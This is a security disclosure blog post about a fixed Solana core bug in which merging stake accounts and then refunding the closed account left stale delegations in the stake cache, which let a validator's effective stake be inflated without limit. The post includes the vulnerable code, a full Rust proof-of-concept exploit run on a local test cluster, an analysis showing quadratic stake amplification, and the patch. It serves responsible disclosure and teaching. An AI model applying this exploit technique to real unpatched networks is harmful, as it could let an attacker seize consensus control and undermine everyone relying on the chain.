Stake², or How To Cheat The Staking Mechanism - Exploring Solana Core Part 2

Intro

Over the past two years, we have spent a lot of time reviewing Solana core code, reporting over 80 bugs of varying severity. This is the second in a series of blog posts detailing what we found the most interesting vulnerabilities that we reported in Solana Core. All bugs were responsibly disclosed under the Solana bug bounty program and subsequently fixed. With this, we hope to inspire more whitehats to keep the ecosystem safe. In this post, we present a vulnerability that would have allowed us to give an unlimited amount of stake to our own or a cooperating validator.

The Bug

As Solana is a proof-of-stake network, users can stake their SOL to a validator, locking the funds in order to give more voting power and more leader slots to that validator. This is very critical from a security perspective, as a set of validators with more than 1/3 of the stake is able to halt the network, and one with more than 2/3 is able to have full control over which transactions are allowed to land and which are not.

If you want to stake a validator, you need to first create a stake account. Then, you can delegate the account. After a one-epoch warm-up period this stake is activated, increasing the validator's voting power and amount of leader slots.

Many decisions of a validator are influenced by how much active stake other validators have. Parsing the chain state every single time this data is needed is obviously not feasible, as parsing all stake accounts takes a long time. This is solved by various caches. As decisions are based on the content of these caches, it is important that they accurately represent the actual chain state. In particular, they have to be updated every time a transaction makes a change to the chain's stake distribution. In practice, whenever an account is changed on the blockchain, the Stakes::store in runtime/src/stakes.rs is called. It checks if something relevant to the cache has changed and makes cache updates accordingly. Here is an excerpt:

//  old_stake is stake lamports and voter_pubkey from the pre-store() version
let old_stake = self.stake_delegations.get(pubkey).map(|delegation| {
    (
        delegation.voter_pubkey,
        delegation.stake(self.epoch, Some(&self.stake_history)),
    )
});

let delegation = stake_state::delegation_from(account);

let stake = delegation.map(|delegation| {
    (
        delegation.voter_pubkey,
        if account.lamports() != 0 {
            delegation.stake(self.epoch, Some(&self.stake_history))
        } else {
            // when account is removed (lamports == 0), this special `else` clause ensures
            // resetting cached stake value below, even if the account happens to be
            // still staked for some (odd) reason
            0
        },
    )
});

// if adjustments need to be made...
if stake != old_stake {
    if let Some((voter_pubkey, stake)) = old_stake {
        self.vote_accounts.sub_stake(&voter_pubkey, stake);
    }
    if let Some((voter_pubkey, stake)) = stake {
        self.vote_accounts.add_stake(&voter_pubkey, stake);
    }
}

if account.lamports() == 0 {
    // when account is removed (lamports == 0), remove it from Stakes as well
    // so that given `pubkey` can be used for any owner in the future, while not
    // affecting Stakes.
    self.stake_delegations.remove(pubkey);
} else if let Some(delegation) = delegation {
    self.stake_delegations.insert(*pubkey, delegation);
}

The input at this point in the function is the stake account of someone who delegated their SOL to a validator. First, the function fetches the amount of stake that was delegated before this transaction was executed, as well as parsing the new state. If this differs, the cache has to be updated.

There is one more case that has to be covered, however. Solana allows active stake accounts to be merged. This closes one stake account and increments the stake of the other one, no cooldown or warm-up required. In this case, the new state of the closed account can't be parsed as the data is zeroed, but one can still change the effective stake. The implementation tries to detect this by checking if account.lamports == 0.

Usually, this is correct, as the stake program closes an account by zeroing its data and setting the lamports to 0. However, what happens if we include another instruction afterwards that puts lamports back into the account? Then, this check will not pass, and the stake delegation won't be removed from the cache. We increment the stake from one delegation, but don't remove the delegation that was deleted.

But can this already be exploited? Is this cache used? Turns out not quite, as this cache is not used directly. It is, however, used in the calculation of the total amount of stake for a vote account, where all delegations are summed up. This doesn't happen a lot though, specifically only (1) at epoch boundaries where this cache would have been fixed anyway, and (2) when a vote account is created. So why do we say it is an interesting vulnerability? In Solana, when a vote account is destroyed its delegations are still there. So when it is recreated, the total amount of stake needs to be recomputed. This means the last piece of the puzzle is to delete and recreate the vote account after merging the delegations, if you want to exploit this bug.

The Exploit

So how do we exploit this? To reproduce this, we set up our own cluster using solana-test-validator, with a very short epoch. The exploit has been written using our poc framework.

First, we need to set up the environment and fetch the vote account of our one validator on the cluster:

let client = localhost_client();
let mut env = RemoteEnvironment::new(
    localhost_client(),
    read_keypair_file("rich-boi.json").unwrap(),
);
let payer = &env.payer();

let vote_acc = Pubkey::from_str(
    client.get_vote_accounts().unwrap().current[0]
        .vote_pubkey
        .as_str(),
)
.unwrap();

To demonstrate this vulnerability, we will use four stake accounts in total: one with 1000 SOL, and 3 with just 1 SOL:

let big_stake = keypair(0);
let little_stake: Vec<_> = (1..4).map(|i| keypair(i)).collect();

env.execute_as_transaction_debug(
    &stake_instruction::create_account_and_delegate_stake(
        &payer.pubkey(),
        &big_stake.pubkey(),
        &vote_acc,
        &Authorized {
            staker: payer.pubkey(),
            withdrawer: payer.pubkey(),
        },
        &Lockup::default(),
        sol_to_lamports(1000.0),
    ),
    &[payer, &big_stake],
);

for stake in little_stake.iter() {
    env.execute_as_transaction(
        &stake_instruction::create_account_and_delegate_stake(
            &payer.pubkey(),
            &stake.pubkey(),
            &vote_acc,
            &Authorized {
                staker: payer.pubkey(),
                withdrawer: payer.pubkey(),
            },
            &Lockup::default(),
            sol_to_lamports(1.0),
        ),
        &[payer, stake],
    );
}

Now, we have to wait for the next epoch to come around, for our stake to be activated.

println!("waiting for next epoch...");
thread::sleep(Duration::from_secs(30));

We're ready to exploit this vulnerability by merging the big stake account into the smaller ones, one after another:

env.execute_as_transaction(
    &[
        stake_instruction::merge(
            &little_stake[0].pubkey(),
            &big_stake.pubkey(),
            &payer.pubkey(),
        )[0]
        .clone(),
        system_instruction::transfer(
            &payer.pubkey(),
            &big_stake.pubkey(),
            sol_to_lamports(1.0),
        ),
    ],
    &[payer],
);

for i in 1..little_stake.len() {
    dbg!(i);
    let src = &little_stake[i - 1];
    let dst = &little_stake[i];
    env.execute_as_transaction(
        &[
            stake_instruction::merge(&dst.pubkey(), &src.pubkey(), &payer.pubkey())[0].clone(),
            system_instruction::transfer(&payer.pubkey(), &src.pubkey(), sol_to_lamports(1.0)),
        ],
        &[payer],
    );
}

After this, the vote account needs to be destroyed and recreated, in order to force a recalculation of the total amount of stake. In the PoC we submitted together with this bug, we skipped this step by patching the validator such that this is recalculated on every vote.

After this exploit was executed, the validator had a total effective stake of 3997 SOL, even though we only had 1003 SOL available to us.

Optimizing the Exploit

So how much effective stake can we achieve in total using this exploit if we start with n lamports? Every stake account that we create needs a minimum balance that we'll call c, because it has to be rent-exempt. A very straight forward strategy is to create one account containing n/2 + c lamports, and then creating n/(2c)-1 accounts containing c lamports. We delegate, wait for one epoch, and then merge the big account into the small ones one after another, similar to what we did in the exploit above. When executed, we end up with n/2 stake accounts that are still active in the cache, with a total amount of stake in O(n²). That means that given an arbitrary amount of time to execute transactions, we can square the amount of stake we can give to our own or a cooperating validator. Note that we don't square the amount of SOL: we square the amount of lamports, meaning we need about 4 SOL to get enough stake to overflow u64.

The Fix

We reported this vulnerability to the Solana team right away through their bug bounty program on 09/14/2021. The issue was fixed in this commit: A feature was added that checks whether the delegation could be deserialized instead of checking for zero-balance:

let remove_delegation = if remove_delegation_on_inactive {
    delegation.is_none()
} else {
    account.lamports() == 0
};

With this blog post, we hope to have made you curious about our work. There will be more posts detailing important vulnerabilities that we found. Stay tuned.